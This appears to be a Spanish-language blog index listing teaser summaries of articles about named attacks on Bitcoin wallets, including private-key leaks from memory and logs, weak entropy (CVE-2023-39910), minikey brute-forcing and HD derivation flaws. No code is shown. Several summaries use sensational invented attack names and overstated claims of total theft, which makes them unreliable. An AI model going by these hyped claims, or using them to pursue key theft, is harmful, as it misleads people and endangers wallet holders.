  • BitSpectre85 Attack: Un ataque criptográfico sigiloso que permite a un atacante recuperar gradualmente una clave privada y obtener el control de un monedero de Bitcoin midiendo los tiempos de las operaciones de división. El ataque BitSpectre85 , la esencia de la vulnerabilidad descrita anteriormente, podría llamarse «BitSpectre85: Invocación Secreta por Temporización». Este ataque demuestra cómo incluso el cifrado simple de datos puede convertirse en un canal vulnerable…Leer más
  • Base58 Ghost Attack: Control total sobre los fondos de la víctima. Una vulnerabilidad crítica en el procesamiento de memoria no saneada de codificación Base58, donde se produce un ataque para filtrar claves privadas desde la memoria y capturar completamente las monedas BTC por parte del atacante. “Base58 Ghost Attack” — extracción de claves privadas de memoria no limpiada después de operaciones de codificación base58. En conclusión, la vulnerabilidad crítica descubierta en el procesamiento de claves privadas mediante la codificación base58 plantea…Leer más
  • Spectral Seed Siphon: Cómo los bytes residuales de memoria revelan claves privadas de monederos de Bitcoin perdidos y se convierten en una vía para recuperar claves privadas, permitiendo a un atacante robar todas las monedas BTC Spectral Seed Siphon La vulnerabilidad de la eliminación incompleta de datos secretos de la RAM en los monederos criptográficos representa una de las amenazas más críticas para el ecosistema Bitcoin moderno. En el…Leer más
  • Binary Extractor Attack: Cómo un estrangulamiento digital sobre las claves privadas ejerce control sobre los fondos de Bitcoin de una víctima, donde un atacante explota una clase Binary vulnerable y cambia las reglas del juego encapsulando y llevando a cabo el robo masivo de monedas BTC. Binary Extractor Attack: Private Byte Strangler Una vulnerabilidad crítica llamada Binary Extractor Attack: Private Byte Strangler ilustra el peligro fundamental de no adherirse a la encapsulación estricta en las aplicaciones criptográficas…Leer más
  • Spectral String Leak: Un compromiso masivo de monederos de Bitcoin a través de la memoria residual y una vulnerabilidad crítica de gestión de cadenas en la red Bitcoin, que permite a un atacante recuperar una clave privada y apropiarse de todas las criptomonedas activas. Spectral String Leak Attack Un ataque Spectral String Leak es una vulnerabilidad crítica que puede provocar la pérdida total de bitcoins de usuarios y servicios debido a un…Leer más
  • Memory Phantom Attack: Una vulnerabilidad crítica de fuga de memoria en Bitcoin que lleva a la recuperación de claves privadas de RAM no limpiada y a la captura gradual de frases semilla de BTC por parte de un atacante, lo que puede conducir al compromiso inmediato de monederos y al robo masivo de activos digitales. Memory Phantom Attack Un Memory Phantom Leak Attack o Divulgación de Memoria Sensible es una categoría de amenaza real y reconocida para Bitcoin (y otras criptomonedas), registrada en el CVE como un…Leer más
  • Log Whisper Attack: Cómo se produce una fuga catastrófica de claves privadas y un compromiso irreversible de los monederos de Bitcoin, donde un atacante convierte un archivo de registro común en una herramienta para interceptar todos los fondos de la víctima en la red BTC. Log Whisper Attack La vulnerabilidad «Log Whisper Attack» es un ejemplo de un error crítico de desarrollo con consecuencias irreversibles. La única defensa efectiva es una prohibición arquitectónica de la clave privada…Leer más
  • Salt Drain Attack (CVE-2023-39910): Una vulnerabilidad crítica en la entropía de Libbitcoin Explorer y la recuperación completa de claves privadas con la incautación de fondos de monederos BTC. Todo el fallo en la entropía del propietario permitió a un atacante robar todas las monedas BTC activas. Salt Drain Attack CVE-2023-39910: (Ataque Milk Sad) El ataque Milk Sad (CVE-2023-39910) permitió a los atacantes recuperar masivamente claves privadas de monederos de Bitcoin creados con Libbitcoin Explorer 3.x, causando importantes pérdidas financieras…Leer más
  • Entropy Recovery Attack: El espectro de la entropía contra Bitcoin: una vulnerabilidad en la generación de números aleatorios y la pérdida de datos secretos, incluida la recuperación de claves privadas y el control total de los fondos BTC por parte de un atacante. «Entropy Ghost Attack» — Batalla contra el Fantasma de la Entropía La vulnerabilidad de generación de entropía de libbitcoin (CVE-2023-39910) es un fallo raro y catastrófico que no solo puede debilitar parcialmente el criptosistema, sino por completo…Leer más
  • Slice Phantom Attack: Cómo los errores de implementación convierten las claves privadas de Bitcoin perdidas en una herramienta de control total para un atacante, donde una nueva clase de ataques de canal lateral de implementación compromete un secreto y hace perder el control al propietario de un monedero de Bitcoin Slice Phantom Attack El ataque Slice Phantom Attack   demuestra que  los detalles de implementación  son tan importantes como la robustez matemática de los algoritmos. El orden incorrecto de las operaciones y la falta de protección de los búferes temporales permiten…Leer más
  • Key Fragmentation Heist – Una Nueva Era de Fragmentación: Cómo las Fugas Parciales se Convierten en Robos Completos de Activos Bitcoin, Donde un Atacante Toma el Control Total y se Apodera por Completo de los Fondos BTC a través de Fugas Fragmentadas de Claves Privadas y Datos Secretos Key Fragmentation Heist Attack Key Fragmentation Heist Attack: El atacante convierte un objeto seguro utilizado para almacenar claves privadas cifradas en una vulnerabilidad al robar la clave fragmento a fragmento, en lugar de…Leer más
  • Stealth Hijack Attack: Recuperación de claves privadas y robo completo del BTC de una víctima mediante una vulnerabilidad de serialización de scripts de Bitcoin, donde el atacante crea un monedero con el uso público de un script sigiloso personalizado, y donde las claves privadas están codificadas en secciones ocultas de la librería LibBitcoin. Stealth Hijack es un ataque que explota un error en el procesamiento de scripts y roba claves secretas ocultas en una estructura de datos. Stealth Hijack Attack: Robando Secretos de Script En un «Stealth Hijack»…Leer más
  • MiniKey Mayhem Attack: Hackeos masivos y adquisición completa de los fondos BTC de las víctimas a través de una vulnerabilidad de ataque de fuerza bruta a claves privadas, donde un atacante se apodera de monederos de Bitcoin perdidos mediante una oleada de miniclaves de 22 caracteres usando el algoritmo KDF. MiniKey Mayhem Attack: Tormenta Directa Imagine un soldado de asalto cibernético cargando contra un «Fuerte MiniKey» con un cañón SHA-256 de alta velocidad: Durante una «tormenta directa», el atacante dispara una oleada de miniclaves de 22 caracteres…Leer más
  • Shaman’s Gate Attack: derivación HD y una vulnerabilidad invisible que permite la recuperación de claves privadas y el robo de todos los BTC a través de las claves maestras, donde el atacante obtiene gradualmente el control total de los fondos de Bitcoin. Shaman’s Gate Attack La clase de ataques «Shaman’s Gate Attack» es una consecuencia fundamental de la derivación no endurecida en las carteras HD, como lo confirman numerosos hackeos. Siguiendo la práctica de…Leer más
  • PhantomKey Heist Attack: fuga invisible de claves privadas y recuperación del acceso a carteras Bitcoin perdidas con control total sobre el saldo de la víctima, donde el atacante, de forma amistosa, inyecta un módulo sobre la auditoría de las claves privadas PhantomKey Heist: un ataque invisible de captura de claves privadas. PhantomKey Heist convierte una inocente llamada de operador de C++ en un gigantesco golpe al tesoro digital. PhantomKey Heist Attack La crítica vulnerabilidad «PhantomKey Heist» demuestra…Leer más
  • RAMnesia Attack: un criptohack basado en RAM que permite la recuperación total de claves privadas y el robo completo de los fondos de carteras Bitcoin perdidas. Un atacante explota la «caja negra» de la memoria y desencadena la vulnerabilidad de fuga de claves secretas, destruyendo así la seguridad de la criptomoneda Bitcoin. RAMnesia Attack RAMnesia es un audaz ataque criptográfico en el que un atacante convierte la RAM de la víctima en una «caja negra» para cazar claves privadas olvidadas. En el escenario del ataque, el hacker…Leer más

  • Read more